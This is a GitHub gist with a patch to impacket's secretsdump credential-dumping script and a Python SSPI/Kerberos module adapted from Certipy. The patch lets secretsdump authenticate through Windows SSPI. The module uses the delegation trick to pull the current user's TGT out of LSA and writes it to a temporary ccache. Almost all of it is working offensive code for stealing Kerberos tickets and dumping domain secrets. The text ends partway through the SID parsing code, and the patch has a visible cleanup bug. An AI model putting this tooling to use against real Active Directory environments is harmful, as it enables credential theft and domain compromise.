Skip to content

Instantly share code, notes, and snippets.

@snovvcrash
Last active January 17, 2024 00:56
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save snovvcrash/ff867dbd922ff2c36f480c0a61819f29 to your computer and use it in GitHub Desktop.
Save snovvcrash/ff867dbd922ff2c36f480c0a61819f29 to your computer and use it in GitHub Desktop.
diff --git a/examples/secretsdump.py b/examples/secretsdump.py
index a881a8ce..df72fd30 100755
--- a/examples/secretsdump.py
+++ b/examples/secretsdump.py
@@ -397,6 +397,7 @@ if __name__ == '__main__':
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication'
' (128 or 256 bits)')
group.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file')
+ group.add_argument('-sspi', action="store_true", help='Use Windows Integrated Authentication (SSPI)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
@@ -465,7 +466,7 @@ if __name__ == '__main__':
Keytab.loadKeysFromKeytab(options.keytab, username, domain, options)
options.k = True
- if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
+ if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None and options.sspi is False:
from getpass import getpass
password = getpass("Password:")
@@ -473,6 +474,24 @@ if __name__ == '__main__':
if options.aesKey is not None:
options.k = True
+ if options.sspi:
+ import platform
+ if platform.system().lower() != 'windows':
+ logging.error('Cannot use SSPI on non-Windows platform')
+ sys.exit(1)
+ import random, string, ntpath, tempfile
+ from impacket.sspi import get_tgt
+ dcName = os.environ['LOGONSERVER'].strip('\\') + f'.{os.environ["USERDNSDOMAIN"]}'
+ targetSPN = f'HOST/{dcName}'
+ logging.debug(f'Trying to get TGS for {repr(targetSPN)} via SSPI')
+ ccache = get_tgt(targetSPN)
+ ccacheName = ''.join([random.choice(string.ascii_letters) for _ in range(8)]) + '.ccache'
+ ccachePath = ntpath.join(tempfile.gettempdir(), ccacheName)
+ logging.debug(f'Saving temporary Kerberos Cache: {ccachePath}')
+ ccache.saveFile(ccachePath)
+ os.environ['KRB5CCNAME'] = ccachePath
+ options.k = options.no_pass = True
+
dumper = DumpSecrets(remoteName, username, password, domain, options)
try:
dumper.dump()
@@ -481,3 +500,6 @@ if __name__ == '__main__':
import traceback
traceback.print_exc()
logging.error(e)
+ finally:
+ logging.debug(f'Removing temporary Kerberos Cache: {ccachePath}')
+ os.remove(ccachePath)
# Reference: https://github.com/ly4k/Certipy/tree/main/certipy/lib/sspi
# Author: https://twitter.com/ly4k_
import os
import io
import enum
import string
import functools
from math import gcd
from typing import Dict
from struct import pack, unpack
from ctypes import (
POINTER,
Structure,
WinError,
addressof,
byref,
c_byte,
c_char,
c_char_p,
c_int16,
c_int32,
c_longlong,
c_ubyte,
c_uint16,
c_uint32,
c_void_p,
cast,
create_string_buffer,
pointer,
sizeof,
string_at,
windll
)
from asn1crypto import core
from unicrypto import hmac as HMAC
from unicrypto.hashlib import md4
from unicrypto.hashlib import md5 as MD5
from unicrypto.hashlib import sha1 as SHA
from unicrypto.pbkdf2 import pbkdf2 as PBKDF2
from unicrypto.symmetric import AES, DES, MODE_CBC, MODE_ECB
from unicrypto.symmetric import RC4 as ARC4
from unicrypto.symmetric import TDES as DES3
from impacket.krb5.ccache import CCache
# -- kerberos.py -----------------------------------------------------
def submit_ticket(ticket_data: bytes):
lsa_handle = LsaConnectUntrusted()
kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos")
message = submit_tkt_helper(ticket_data, logonid=0)
ret_msg, ret_status, free_ptr = LsaCallAuthenticationPackage(
lsa_handle, kerberos_package_id, message
)
if ret_status != 0:
raise get_lsa_error(ret_status)
if len(ret_msg) > 0:
LsaFreeReturnBuffer(free_ptr)
return True
def get_tgt(target: str) -> CCache:
ctx = AcquireCredentialsHandle(None, "kerberos", target, SECPKG_CRED.OUTBOUND)
res, ctx, data, outputflags, expiry = InitializeSecurityContext(
ctx,
target,
token=None,
ctx=ctx,
flags=ISC_REQ.DELEGATE | ISC_REQ.MUTUAL_AUTH | ISC_REQ.ALLOCATE_MEMORY,
)
if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:
lsa_handle = LsaConnectUntrusted()
kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos")
raw_ticket = extract_ticket(lsa_handle, kerberos_package_id, 0, target)
key = Key(raw_ticket["Key"]["KeyType"], raw_ticket["Key"]["Key"])
token = InitialContextToken.load(data[0][1])
ticket = AP_REQ(token.native["innerContextToken"]).native
cipher = _enctype_table[ticket["authenticator"]["etype"]]
dec_authenticator = cipher.decrypt(key, 11, ticket["authenticator"]["cipher"])
authenticator = Authenticator.load(dec_authenticator).native
if authenticator["cksum"]["cksumtype"] != 0x8003:
raise Exception("Bad checksum")
checksum_data = AuthenticatorChecksum.from_bytes(
authenticator["cksum"]["checksum"]
)
if ChecksumFlags.GSS_C_DELEG_FLAG not in checksum_data.flags:
raise Exception("Delegation flag not set")
cred_orig = KRB_CRED.load(checksum_data.delegation_data).native
dec_authenticator = cipher.decrypt(key, 14, cred_orig["enc-part"]["cipher"])
te = {}
te["etype"] = 0
te["cipher"] = dec_authenticator
ten = EncryptedData(te)
t = {}
t["pvno"] = cred_orig["pvno"]
t["msg-type"] = cred_orig["msg-type"]
t["tickets"] = cred_orig["tickets"]
t["enc-part"] = ten
krb_cred = KRB_CRED(t)
ccache = CCache()
ccache.fromKRBCRED(krb_cred.dump())
return ccache
def get_tgs(target: str) -> CCache:
# can be skipped - start
ctx = AcquireCredentialsHandle(None, "kerberos", target, SECPKG_CRED.OUTBOUND)
res, ctx, data, _, _ = InitializeSecurityContext(
ctx,
target,
token=None,
ctx=ctx,
flags=ISC_REQ.ALLOCATE_MEMORY | ISC_REQ.CONNECTION,
)
if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:
sec_struct = SecPkgContext_SessionKey()
QueryContextAttributes(ctx, SECPKG_ATTR.SESSION_KEY, sec_struct)
sec_struct.Buffer
InitialContextToken.load(data[0][1]).native["innerContextToken"]
# can be skipped - end
lsa_handle = LsaConnectUntrusted()
kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos")
raw_ticket = extract_ticket(lsa_handle, kerberos_package_id, 0, target)
krb_cred = KRB_CRED.load(raw_ticket["Ticket"])
ccache = CCache()
ccache.fromKRBCRED(krb_cred.dump())
return ccache
# -- structs.py ------------------------------------------------------
def _to_pascal_case(snake_str: str) -> str:
components = snake_str.split("_")
return "".join(x.title() for x in components)
def _high_bit(value):
return value.bit_length() - 1
def _decompose(flag, value):
not_covered = value
negative = value < 0
members = []
for member in flag:
member_value = member.value
if member_value and member_value & value == member_value:
members.append(member)
not_covered &= ~member_value
if not negative:
tmp = not_covered
while tmp:
flag_value = 2 ** _high_bit(tmp)
if flag_value in flag._value2member_map_:
members.append(flag._value2member_map_[flag_value])
not_covered &= ~flag_value
tmp &= ~flag_value
if not members and value in flag._value2member_map_:
members.append(flag._value2member_map_[value])
members.sort(key=lambda m: m._value_, reverse=True)
if len(members) > 1 and members[0].value == value:
members.pop(0)
return members, not_covered
class IntFlag(enum.IntFlag):
def to_list(self):
cls = self.__class__
members, _ = _decompose(cls, self._value_)
return members
def to_str_list(self):
return list(map(lambda x: str(x), self.to_list()))
def __str__(self):
cls = self.__class__
if self._name_ is not None:
return "%s" % (_to_pascal_case(self._name_))
members, _ = _decompose(cls, self._value_)
if len(members) == 1 and members[0]._name_ is None:
return "%r" % (members[0]._value_)
else:
return "%s" % (
", ".join(
[_to_pascal_case(str(m._name_ or m._value_)) for m in members]
),
)
def __repr__(self):
return str(self)
TAG = "explicit"
APPLICATION = 1
class krb5int32(core.Integer):
pass
class krb5uint32(core.Integer):
pass
class KerberosString(core.GeneralString):
pass
class SequenceOfKerberosString(core.SequenceOf):
_child_spec = KerberosString
class Realm(KerberosString):
pass
class PrincipalName(core.Sequence):
_fields = [
("name-type", krb5int32, {"tag_type": TAG, "tag": 0}),
("name-string", SequenceOfKerberosString, {"tag_type": TAG, "tag": 1}),
]
class KerberosTime(core.GeneralizedTime):
pass
class AuthorizationDataElement(core.Sequence):
_fields = [
("ad-type", krb5int32, {"tag_type": TAG, "tag": 0}),
("ad-data", core.OctetString, {"tag_type": TAG, "tag": 1}),
]
class AuthorizationData(core.SequenceOf):
_child_spec = AuthorizationDataElement
class APOptions(core.BitString):
_map = {
0: "reserved",
1: "use-session-key",
2: "mutual-required",
}
class EncryptedData(core.Sequence):
_fields = [
("etype", krb5int32, {"tag_type": TAG, "tag": 0}),
("kvno", krb5uint32, {"tag_type": TAG, "tag": 1, "optional": True}),
("cipher", core.OctetString, {"tag_type": TAG, "tag": 2}),
]
class EncryptionKey(core.Sequence):
_fields = [
("keytype", krb5uint32, {"tag_type": TAG, "tag": 0}),
("keyvalue", core.OctetString, {"tag_type": TAG, "tag": 1}),
]
class Ticket(core.Sequence):
explicit = (APPLICATION, 1)
_fields = [
("tkt-vno", krb5int32, {"tag_type": TAG, "tag": 0}),
("realm", Realm, {"tag_type": TAG, "tag": 1}),
("sname", PrincipalName, {"tag_type": TAG, "tag": 2}),
("enc-part", EncryptedData, {"tag_type": TAG, "tag": 3}),
]
class SequenceOfTicket(core.SequenceOf):
_child_spec = Ticket
class Checksum(core.Sequence):
_fields = [
("cksumtype", krb5int32, {"tag_type": TAG, "tag": 0}),
("checksum", core.OctetString, {"tag_type": TAG, "tag": 1}),
]
class Authenticator(core.Sequence):
explicit = (APPLICATION, 2)
_fields = [
("authenticator-vno", krb5int32, {"tag_type": TAG, "tag": 0}),
("crealm", Realm, {"tag_type": TAG, "tag": 1}),
("cname", PrincipalName, {"tag_type": TAG, "tag": 2}),
("cksum", Checksum, {"tag_type": TAG, "tag": 3, "optional": True}),
("cusec", krb5int32, {"tag_type": TAG, "tag": 4}),
("ctime", KerberosTime, {"tag_type": TAG, "tag": 5}),
("subkey", EncryptionKey, {"tag_type": TAG, "tag": 6, "optional": True}),
("seq-number", krb5uint32, {"tag_type": TAG, "tag": 7, "optional": True}),
(
"authorization-data",
AuthorizationData,
{"tag_type": TAG, "tag": 8, "optional": True},
),
]
class AP_REQ(core.Sequence):
explicit = (APPLICATION, 14)
_fields = [
("pvno", krb5int32, {"tag_type": TAG, "tag": 0}),
("msg-type", krb5int32, {"tag_type": TAG, "tag": 1}),
("ap-options", APOptions, {"tag_type": TAG, "tag": 2}),
("ticket", Ticket, {"tag_type": TAG, "tag": 3}),
("authenticator", EncryptedData, {"tag_type": TAG, "tag": 4}),
]
class KRB_CRED(core.Sequence):
explicit = (APPLICATION, 22)
_fields = [
("pvno", core.Integer, {"tag_type": TAG, "tag": 0}),
("msg-type", core.Integer, {"tag_type": TAG, "tag": 1}),
("tickets", SequenceOfTicket, {"tag_type": TAG, "tag": 2}),
("enc-part", EncryptedData, {"tag_type": TAG, "tag": 3}),
]
class MechType(core.ObjectIdentifier):
_map = {
"1.3.6.1.4.1.311.2.2.10": "NTLMSSP - Microsoft NTLM Security Support Provider",
"1.2.840.48018.1.2.2": "MS KRB5 - Microsoft Kerberos 5",
"1.2.840.113554.1.2.2": "KRB5 - Kerberos 5",
"1.2.840.113554.1.2.2.3": "KRB5 - Kerberos 5 - User to User",
"1.3.6.1.4.1.311.2.2.30": "NEGOEX - SPNEGO Extended Negotiation Security Mechanism",
}
class InitialContextToken(core.Sequence):
class_ = 1
tag = 0
_fields = [
("thisMech", MechType, {"optional": False}),
("unk_bool", core.Boolean, {"optional": False}),
("innerContextToken", core.Any, {"optional": False}),
]
_oid_pair = ("thisMech", "innerContextToken")
_oid_specs = {
"KRB5 - Kerberos 5": AP_REQ,
}
class ChecksumFlags(enum.IntFlag):
GSS_C_DELEG_FLAG = 1
GSS_C_MUTUAL_FLAG = 2
GSS_C_REPLAY_FLAG = 4
GSS_C_SEQUENCE_FLAG = 8
GSS_C_CONF_FLAG = 16
GSS_C_INTEG_FLAG = 32
GSS_C_DCE_STYLE = 0x1000
class AuthenticatorChecksum:
def __init__(self):
self.length_of_binding = None
self.channel_binding = None
self.flags = None
self.delegation = None
self.delegation_length = None
self.delegation_data = None
self.extensions = None
@staticmethod
def from_bytes(data):
return AuthenticatorChecksum.from_buffer(io.BytesIO(data))
@staticmethod
def from_buffer(buffer):
ac = AuthenticatorChecksum()
ac.length_of_binding = int.from_bytes(
buffer.read(4), byteorder="little", signed=False
)
ac.channel_binding = buffer.read(
ac.length_of_binding
)
ac.flags = ChecksumFlags(
int.from_bytes(buffer.read(4), byteorder="little", signed=False)
)
if ac.flags & ChecksumFlags.GSS_C_DELEG_FLAG:
ac.delegation = bool(
int.from_bytes(buffer.read(2), byteorder="little", signed=False)
)
ac.delegation_length = int.from_bytes(
buffer.read(2), byteorder="little", signed=False
)
ac.delegation_data = buffer.read(ac.delegation_length)
ac.extensions = buffer.read()
return ac
def to_bytes(self):
t = len(self.channel_binding).to_bytes(4, byteorder="little", signed=False)
t += self.channel_binding
t += self.flags.to_bytes(4, byteorder="little", signed=False)
if self.flags & ChecksumFlags.GSS_C_DELEG_FLAG:
t += int(self.delegation).to_bytes(2, byteorder="little", signed=False)
t += len(self.delegation_data.to_bytes()).to_bytes(
2, byteorder="little", signed=False
)
t += self.delegation_data.to_bytes()
if self.extensions:
t += self.extensions.to_bytes()
return t
# -- encryption.py ---------------------------------------------------
def get_random_bytes(lenBytes):
return os.urandom(lenBytes)
class Enctype(object):
DES_CRC = 1
DES_MD4 = 2
DES_MD5 = 3
DES3 = 16
AES128 = 17
AES256 = 18
RC4 = 23
class Cksumtype(object):
CRC32 = 1
MD4 = 2
MD4_DES = 3
MD5 = 7
MD5_DES = 8
SHA1 = 9
SHA1_DES3 = 12
SHA1_AES128 = 15
SHA1_AES256 = 16
HMAC_MD5 = -138
class InvalidChecksum(ValueError):
pass
def _zeropad(s, padsize):
padlen = (padsize - (len(s) % padsize)) % padsize
return s + b"\x00" * padlen
def _xorbytes(b1, b2):
assert len(b1) == len(b2)
t1 = int.from_bytes(b1, byteorder="big", signed=False)
t2 = int.from_bytes(b2, byteorder="big", signed=False)
return (t1 ^ t2).to_bytes(len(b1), byteorder="big", signed=False)
def _mac_equal(mac1, mac2):
assert len(mac1) == len(mac2)
res = 0
for x, y in zip(mac1, mac2):
res |= x ^ y
return res == 0
def _nfold(str, nbytes):
def rotate_right(str, nbits):
num = int.from_bytes(str, byteorder="big", signed=False)
size = len(str) * 8
nbits %= size
body = num >> nbits
remains = (num << (size - nbits)) - (body << size)
return (body + remains).to_bytes(len(str), byteorder="big", signed=False)
def add_ones_complement(str1, str2):
n = len(str1)
v = []
for i in range(0, len(str1), 1):
t = str1[i] + str2[i]
v.append(t)
while any(x & ~0xFF for x in v):
v = [(v[i - n + 1] >> 8) + (v[i] & 0xFF) for i in range(n)]
return b"".join(x.to_bytes(1, byteorder="big", signed=False) for x in v)
slen = len(str)
lcm = int(nbytes * slen / gcd(nbytes, slen))
bigstr = b"".join((rotate_right(str, 13 * i) for i in range(int(lcm / slen))))
slices = (bigstr[p : p + nbytes] for p in range(0, lcm, nbytes))
return functools.reduce(add_ones_complement, slices)
def _is_weak_des_key(keybytes):
return keybytes in (
b"\x01\x01\x01\x01\x01\x01\x01\x01",
b"\xFE\xFE\xFE\xFE\xFE\xFE\xFE\xFE",
b"\x1F\x1F\x1F\x1F\x0E\x0E\x0E\x0E",
b"\xE0\xE0\xE0\xE0\xF1\xF1\xF1\xF1",
b"\x01\xFE\x01\xFE\x01\xFE\x01\xFE",
b"\xFE\x01\xFE\x01\xFE\x01\xFE\x01",
b"\x1F\xE0\x1F\xE0\x0E\xF1\x0E\xF1",
b"\xE0\x1F\xE0\x1F\xF1\x0E\xF1\x0E",
b"\x01\xE0\x01\xE0\x01\xF1\x01\xF1",
b"\xE0\x01\xE0\x01\xF1\x01\xF1\x01",
b"\x1F\xFE\x1F\xFE\x0E\xFE\x0E\xFE",
b"\xFE\x1F\xFE\x1F\xFE\x0E\xFE\x0E",
b"\x01\x1F\x01\x1F\x01\x0E\x01\x0E",
b"\x1F\x01\x1F\x01\x0E\x01\x0E\x01",
b"\xE0\xFE\xE0\xFE\xF1\xFE\xF1\xFE",
b"\xFE\xE0\xFE\xE0\xFE\xF1\xFE\xF1",
)
class _EnctypeProfile(object):
@classmethod
def random_to_key(cls, seed):
if len(seed) != cls.seedsize:
raise ValueError("Wrong seed length")
return Key(cls.enctype, seed)
class _SimplifiedEnctype(_EnctypeProfile):
@classmethod
def derive(cls, key, constant):
plaintext = _nfold(constant, cls.blocksize)
rndseed = b""
while len(rndseed) < cls.seedsize:
ciphertext = cls.basic_encrypt(key, plaintext)
rndseed += ciphertext
plaintext = ciphertext
return cls.random_to_key(rndseed[0 : cls.seedsize])
@classmethod
def encrypt(cls, key, keyusage, plaintext, confounder):
ki = cls.derive(key, pack(">IB", keyusage, 0x55))
ke = cls.derive(key, pack(">IB", keyusage, 0xAA))
if confounder is None:
confounder = get_random_bytes(cls.blocksize)
basic_plaintext = confounder + _zeropad(plaintext, cls.padsize)
hmac = HMAC.new(ki.contents, basic_plaintext, cls.hashmod).digest()
return cls.basic_encrypt(ke, basic_plaintext) + hmac[: cls.macsize]
@classmethod
def decrypt(cls, key, keyusage, ciphertext):
ki = cls.derive(key, pack(">IB", keyusage, 0x55))
ke = cls.derive(key, pack(">IB", keyusage, 0xAA))
if len(ciphertext) < cls.blocksize + cls.macsize:
raise ValueError("ciphertext too short")
basic_ctext, mac = ciphertext[: -cls.macsize], ciphertext[-cls.macsize :]
if len(basic_ctext) % cls.padsize != 0:
raise ValueError("ciphertext does not meet padding requirement")
basic_plaintext = cls.basic_decrypt(ke, basic_ctext)
hmac = HMAC.new(ki.contents, basic_plaintext, cls.hashmod).digest()
expmac = hmac[: cls.macsize]
if not _mac_equal(mac, expmac):
raise InvalidChecksum("ciphertext integrity failure")
return basic_plaintext[cls.blocksize :]
@classmethod
def prf(cls, key, string):
hashval = cls.hashmod(string).digest()
truncated = hashval[: -(len(hashval) % cls.blocksize)]
kp = cls.derive(key, b"prf")
return cls.basic_encrypt(kp, truncated)
class _DESCBC(_SimplifiedEnctype):
enctype = Enctype.DES_MD5
keysize = 8
seedsize = 8
blocksize = 8
padsize = 8
macsize = 16
hashmod = MD5
@classmethod
def encrypt(cls, key, keyusage, plaintext, confounder):
if confounder is None:
confounder = get_random_bytes(cls.blocksize)
basic_plaintext = (
confounder + "\x00" * cls.macsize + _zeropad(plaintext, cls.padsize)
)
checksum = cls.hashmod.new(basic_plaintext).digest()
basic_plaintext = (
basic_plaintext[: len(confounder)]
+ checksum
+ basic_plaintext[len(confounder) + len(checksum) :]
)
return cls.basic_encrypt(key, basic_plaintext)
@classmethod
def decrypt(cls, key, keyusage, ciphertext):
if len(ciphertext) < cls.blocksize + cls.macsize:
raise ValueError("ciphertext too short")
complex_plaintext = cls.basic_decrypt(key, ciphertext)
cofounder = complex_plaintext[: cls.padsize]
mac = complex_plaintext[cls.padsize : cls.padsize + cls.macsize]
message = complex_plaintext[cls.padsize + cls.macsize :]
expmac = cls.hashmod.new(cofounder + "\x00" * cls.macsize + message).digest()
if not _mac_equal(mac, expmac):
raise InvalidChecksum("ciphertext integrity failure")
return message
@classmethod
def mit_des_string_to_key(cls, string, salt):
def fixparity(deskey):
temp = b""
for byte in deskey:
t = (bin(byte)[2:]).rjust(8, "0")
if t[:7].count("1") % 2 == 0:
temp += int(t[:7] + "1", 2).to_bytes(
1, byteorder="big", signed=False
)
else:
temp += int(t[:7] + "0", 2).to_bytes(
1, byteorder="big", signed=False
)
return temp
def addparity(l1):
temp = list()
for byte in l1:
if (bin(byte).count("1") % 2) == 0:
byte = (byte << 1) | 0b00000001
else:
byte = (byte << 1) & 0b11111110
temp.append(byte)
return temp
def XOR(l1, l2):
temp = list()
for b1, b2 in zip(l1, l2):
temp.append((b1 ^ b2) & 0b01111111)
return temp
odd = True
s = string + salt
tempstring = [0, 0, 0, 0, 0, 0, 0, 0]
s = s + b"\x00" * (8 - (len(s) % 8))
for block in [s[i : i + 8] for i in range(0, len(s), 8)]:
temp56 = list()
for byte in block:
temp56.append(byte & 0b01111111)
if odd == False:
bintemp = ""
for byte in temp56:
bintemp += (bin(byte)[2:]).rjust(7, "0")
bintemp = bintemp[::-1]
temp56 = list()
for bits7 in [bintemp[i : i + 7] for i in range(0, len(bintemp), 7)]:
temp56.append(int(bits7, 2))
odd = not odd
tempstring = XOR(tempstring, temp56)
tempkey = b"".join(
byte.to_bytes(1, byteorder="big", signed=False)
for byte in addparity(tempstring)
)
if _is_weak_des_key(tempkey):
tempkey[7] = (tempkey[7] ^ 0xF0).to_bytes(1, byteorder="big", signed=False)
cipher = DES(tempkey, MODE_CBC, tempkey)
chekcsumkey = cipher.encrypt(s)[-8:]
chekcsumkey = fixparity(chekcsumkey)
if _is_weak_des_key(chekcsumkey):
chekcsumkey[7] = chr(ord(chekcsumkey[7]) ^ 0xF0)
return Key(cls.enctype, chekcsumkey)
@classmethod
def basic_encrypt(cls, key, plaintext):
assert len(plaintext) % 8 == 0
des = DES(key.contents, MODE_CBC, b"\x00" * 8)
return des.encrypt(plaintext)
@classmethod
def basic_decrypt(cls, key, ciphertext):
assert len(ciphertext) % 8 == 0
des = DES(key.contents, MODE_CBC, b"\x00" * 8)
return des.decrypt(ciphertext)
@classmethod
def string_to_key(cls, string, salt, params):
if params is not None and params != "":
raise ValueError("Invalid DES string-to-key parameters")
key = cls.mit_des_string_to_key(string, salt)
return key
class _DES3CBC(_SimplifiedEnctype):
enctype = Enctype.DES3
keysize = 24
seedsize = 21
blocksize = 8
padsize = 8
macsize = 20
hashmod = SHA
@classmethod
def random_to_key(cls, seed):
def expand(seed):
def parity(b):
b &= ~1
return b if bin(b & ~1).count("1") % 2 else b | 1
assert len(seed) == 7
firstbytes = [parity(b & ~1) for b in seed]
lastbyte = parity(sum((seed[i] & 1) << i + 1 for i in range(7)))
keybytes = b"".join(
b.to_bytes(1, byteorder="big", signed=False)
for b in firstbytes + [lastbyte]
)
if _is_weak_des_key(keybytes):
keybytes[7] = (keybytes[7] ^ 0xF0).to_bytes(
1, byteorder="big", signed=False
)
return keybytes
if len(seed) != 21:
raise ValueError("Wrong seed length")
k1, k2, k3 = expand(seed[:7]), expand(seed[7:14]), expand(seed[14:])
return Key(cls.enctype, k1 + k2 + k3)
@classmethod
def string_to_key(cls, string, salt, params):
if params is not None and params != "":
raise ValueError("Invalid DES3 string-to-key parameters")
k = cls.random_to_key(_nfold(string + salt, 21))
return cls.derive(k, "kerberos".encode())
@classmethod
def basic_encrypt(cls, key, plaintext):
assert len(plaintext) % 8 == 0
des3 = DES3(key.contents, MODE_CBC, IV=b"\x00" * 8)
return des3.encrypt(plaintext)
@classmethod
def basic_decrypt(cls, key, ciphertext):
assert len(ciphertext) % 8 == 0
des3 = DES3(key.contents, MODE_CBC, IV=b"\x00" * 8)
return des3.decrypt(ciphertext)
class _AESEnctype(_SimplifiedEnctype):
blocksize = 16
padsize = 1
macsize = 12
hashmod = SHA
@classmethod
def string_to_key(cls, string, salt, params):
(iterations,) = unpack(">L", params or b"\x00\x00\x10\x00")
seed = PBKDF2(string, salt, iterations, cls.seedsize)
tkey = cls.random_to_key(seed)
return cls.derive(tkey, "kerberos".encode())
@classmethod
def basic_encrypt(cls, key, plaintext):
assert len(plaintext) >= 16
aes = AES(key.contents, MODE_CBC, b"\x00" * 16)
ctext = aes.encrypt(_zeropad(plaintext, 16))
if len(plaintext) > 16:
lastlen = len(plaintext) % 16 or 16
ctext = ctext[:-32] + ctext[-16:] + ctext[-32:-16][:lastlen]
return ctext
@classmethod
def basic_decrypt(cls, key, ciphertext):
assert len(ciphertext) >= 16
aes = AES(key.contents, MODE_ECB)
if len(ciphertext) == 16:
return aes.decrypt(ciphertext)
cblocks = [ciphertext[p : p + 16] for p in range(0, len(ciphertext), 16)]
lastlen = len(cblocks[-1])
prev_cblock = b"\x00" * 16
plaintext = b""
for b in cblocks[:-2]:
plaintext += _xorbytes(aes.decrypt(b), prev_cblock)
prev_cblock = b
b = aes.decrypt(cblocks[-2])
lastplaintext = _xorbytes(b[:lastlen], cblocks[-1])
omitted = b[lastlen:]
plaintext += _xorbytes(aes.decrypt(cblocks[-1] + omitted), prev_cblock)
return plaintext + lastplaintext
class _AES128CTS(_AESEnctype):
enctype = Enctype.AES128
keysize = 16
seedsize = 16
class _AES256CTS(_AESEnctype):
enctype = Enctype.AES256
keysize = 32
seedsize = 32
class _RC4(_EnctypeProfile):
enctype = Enctype.RC4
keysize = 16
seedsize = 16
@staticmethod
def usage_str(keyusage):
table = {3: 8, 23: 13}
msusage = table[keyusage] if keyusage in table else keyusage
return pack("<I", msusage)
@classmethod
def string_to_key(cls, string, salt, params):
utf16string = string.decode("UTF-8").encode("UTF-16LE")
data = md4(utf16string).digest()
return Key(cls.enctype, data)
@classmethod
def encrypt(cls, key, keyusage, plaintext, confounder):
if confounder is None:
confounder = get_random_bytes(8)
ki = HMAC.new(key.contents, cls.usage_str(keyusage), MD5).digest()
cksum = HMAC.new(ki, confounder + plaintext, MD5).digest()
ke = HMAC.new(ki, cksum, MD5).digest()
return cksum + ARC4(ke).encrypt(confounder + plaintext)
@classmethod
def decrypt(cls, key, keyusage, ciphertext):
if len(ciphertext) < 24:
raise ValueError("ciphertext too short")
cksum, basic_ctext = ciphertext[:16], ciphertext[16:]
ki = HMAC.new(key.contents, cls.usage_str(keyusage), MD5).digest()
ke = HMAC.new(ki, cksum, MD5).digest()
basic_plaintext = ARC4(ke).decrypt(basic_ctext)
exp_cksum = HMAC.new(ki, basic_plaintext, MD5).digest()
ok = _mac_equal(cksum, exp_cksum)
if not ok and keyusage == 9:
ki = HMAC.new(key.contents, pack("<I", 8), MD5).digest()
exp_cksum = HMAC.new(ki, basic_plaintext, MD5).digest()
ok = _mac_equal(cksum, exp_cksum)
if not ok:
raise InvalidChecksum("ciphertext integrity failure")
return basic_plaintext[8:]
@classmethod
def prf(cls, key, string):
return HMAC.new(key.contents, string, SHA).digest()
class _ChecksumProfile(object):
@classmethod
def verify(cls, key, keyusage, text, cksum):
expected = cls.checksum(key, keyusage, text)
if not _mac_equal(cksum, expected):
raise InvalidChecksum("checksum verification failure")
class _SimplifiedChecksum(_ChecksumProfile):
@classmethod
def checksum(cls, key, keyusage, text):
kc = cls.enc.derive(key, pack(">IB", keyusage, 0x99))
hmac = HMAC.new(kc.contents, text, cls.enc.hashmod).digest()
return hmac[: cls.macsize]
@classmethod
def verify(cls, key, keyusage, text, cksum):
if key.enctype != cls.enc.enctype:
raise ValueError("Wrong key type for checksum")
super(_SimplifiedChecksum, cls).verify(key, keyusage, text, cksum)
class _SHA1AES128(_SimplifiedChecksum):
macsize = 12
enc = _AES128CTS
class _SHA1AES256(_SimplifiedChecksum):
macsize = 12
enc = _AES256CTS
class _SHA1DES3(_SimplifiedChecksum):
macsize = 20
enc = _DES3CBC
class _HMACMD5(_ChecksumProfile):
@classmethod
def checksum(cls, key, keyusage, text):
ksign = HMAC.new(key.contents, b"signaturekey\x00", MD5).digest()
md5hash = MD5(_RC4.usage_str(keyusage) + text).digest()
return HMAC.new(ksign, md5hash, MD5).digest()
@classmethod
def verify(cls, key, keyusage, text, cksum):
if key.enctype != Enctype.RC4:
raise ValueError("Wrong key type for checksum")
super(_HMACMD5, cls).verify(key, keyusage, text, cksum)
_enctype_table: Dict[str, _SimplifiedEnctype] = {
Enctype.DES_MD5: _DESCBC,
Enctype.DES3: _DES3CBC,
Enctype.AES128: _AES128CTS,
Enctype.AES256: _AES256CTS,
Enctype.RC4: _RC4,
}
_checksum_table = {
Cksumtype.SHA1_DES3: _SHA1DES3,
Cksumtype.SHA1_AES128: _SHA1AES128,
Cksumtype.SHA1_AES256: _SHA1AES256,
Cksumtype.HMAC_MD5: _HMACMD5,
0xFFFFFF76: _HMACMD5,
}
def _get_enctype_profile(enctype):
if enctype not in _enctype_table:
raise ValueError("Invalid enctype %d" % enctype)
return _enctype_table[enctype]
def _get_checksum_profile(cksumtype):
if cksumtype not in _checksum_table:
raise ValueError("Invalid cksumtype %d" % cksumtype)
return _checksum_table[cksumtype]
class Key(object):
def __init__(self, enctype: Enctype, contents: bytes):
e = _get_enctype_profile(enctype)
if len(contents) != e.keysize:
raise ValueError("Wrong key length")
self.enctype = enctype
self.contents = contents
# -- netsecapi.py ----------------------------------------------------
BYTE = c_ubyte
SHORT = c_int16
USHORT = c_uint16
LONG = c_int32
LPVOID = c_void_p
PVOID = LPVOID
DWORD = c_uint32
HANDLE = LPVOID
PHANDLE = POINTER(HANDLE)
LPHANDLE = PHANDLE
NTSTATUS = LONG
PNTSTATUS = POINTER(NTSTATUS)
USHORT = c_uint16
ULONG = c_uint32
PULONG = POINTER(ULONG)
LARGE_INTEGER = c_longlong
LPBYTE = POINTER(BYTE)
LPSTR = c_char_p
CHAR = c_char
PCHAR = LPSTR
SEC_CHAR = CHAR
PSEC_CHAR = PCHAR
ERROR_SUCCESS = 0
maxtoken_size = 2880
class SID:
def __init__(self):
self.Revision = None
self.SubAuthorityCount = None
self.IdentifierAuthority = None
self.SubAuthority = []
def __str__(self):
t = "S-1-"
if self.IdentifierAuthority < 2**32:
t += str(self.IdentifierAuthority)
else:
t += "0x" + self.IdentifierAuthority.to_bytes(6, "big").hex().upper().rjust(
12, "0"
)
for i in self.SubAuthority:
t += "-" + str(i)
return t
@staticmethod
def from_ptr(ptr):
if ptr == None:
return None
data = string_at(ptr, 8)
buff = io.BytesIO(data)
sid = SID()
sid.Revision = int.from_bytes(buff.read(1), "little", signed=False)
